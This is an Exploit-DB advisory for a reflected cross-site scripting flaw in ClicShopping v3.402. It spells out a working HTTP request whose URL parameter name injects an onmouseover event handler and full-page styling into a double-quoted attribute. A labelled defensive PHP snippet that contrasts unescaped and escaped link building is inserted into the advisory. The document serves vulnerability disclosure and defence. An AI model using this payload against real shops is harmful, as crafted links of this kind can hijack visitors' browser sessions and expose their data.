[webapps] ClicShopping v3.402 - Cross-Site Scripting (XSS)
source link: https://www.exploit-db.com/exploits/51135
## Title: ClicShopping v3.402 - Cross-Site Scripting (XSS)
## Author: nu11secur1ty
## Date: 11.20.2022
## Vendor: https://www.clicshopping.org/forum/
## Software: https://github.com/ClicShopping/ClicShopping_V3/releases/tag/version3_402
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3
## Description:
The name of an arbitrarily supplied URL parameter is copied into the
value of an HTML tag attribute which is encapsulated in double
quotation marks.
An attacker can trick users into opening a very dangerous link, obtain
sensitive information, or destroy some components of your
system.
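
The pattern described above, as an added defensive example (not ClicShopping's code and not the author's): a hypothetical PHP link builder that reflects query parameter names into a double-quoted attribute, next to a form that percent-encodes and HTML-escapes them. The function names and the sample parameter are constructed for illustration, and the attribute check assumes PHP's DOM extension is available.

```php
<?php
declare(strict_types=1);

// Hypothetical link builder (not ClicShopping code): copies query parameter
// names and values into a double-quoted href without any encoding.
function link_vulnerable(array $query): string
{
    $pairs = [];
    foreach ($query as $name => $value) {
        $pairs[] = $name . '=' . $value; // the NAME is user-controlled as well
    }
    return '<a href="index.php?' . implode('&', $pairs) . '">next</a>';
}

// Hardened form: percent-encode names and values, then HTML-escape the whole
// URL for the attribute context so a double quote cannot close the attribute.
function link_hardened(array $query): string
{
    $qs = http_build_query($query, '', '&', PHP_QUERY_RFC3986);
    $href = htmlspecialchars('index.php?' . $qs, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<a href="' . $href . '">next</a>';
}

// Attribute names an HTML parser sees on the first <a> (needs ext-dom).
function anchor_attributes(string $html): array
{
    $doc = new DOMDocument();
    $doc->loadHTML($html, LIBXML_NOERROR | LIBXML_NOWARNING);
    $names = [];
    foreach ($doc->getElementsByTagName('a')->item(0)->attributes as $attr) {
        $names[] = $attr->nodeName;
    }
    return $names;
}

// Constructed, harmless sample: a parameter NAME carrying a double quote.
$query = ['Search' => '', 'AdvancedSearch' => '', 'x" data-injected="1' => '1'];

foreach (['vulnerable' => link_vulnerable($query), 'hardened' => link_hardened($query)] as $label => $html) {
    echo $label, ': ', $html, PHP_EOL;
    echo '  attributes: ', implode(', ', anchor_attributes($html)), PHP_EOL;
}
```

In the unescaped form the parser reports an extra attribute on the element; in the hardened form only `href` remains.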
## STATUS: HIGH Vulnerability
[+] Payload:
```http
GET /ClicShopping_V3-version3_402/index.php?Search&AdvancedSearch&bel9c%22onmouseover%3d%22alert(`Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole-Hello-hole`)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22zgm9j=1
HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.107 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="107", "Chromium";v="107"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/clicshopping.org/2022/ClicShopping_V3)
## Proof and Exploit:
[href](https://streamable.com/rzpgsu)
## Time spent
`1:00`
--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
nu11secur1ty <http://nu11secur1ty.com/>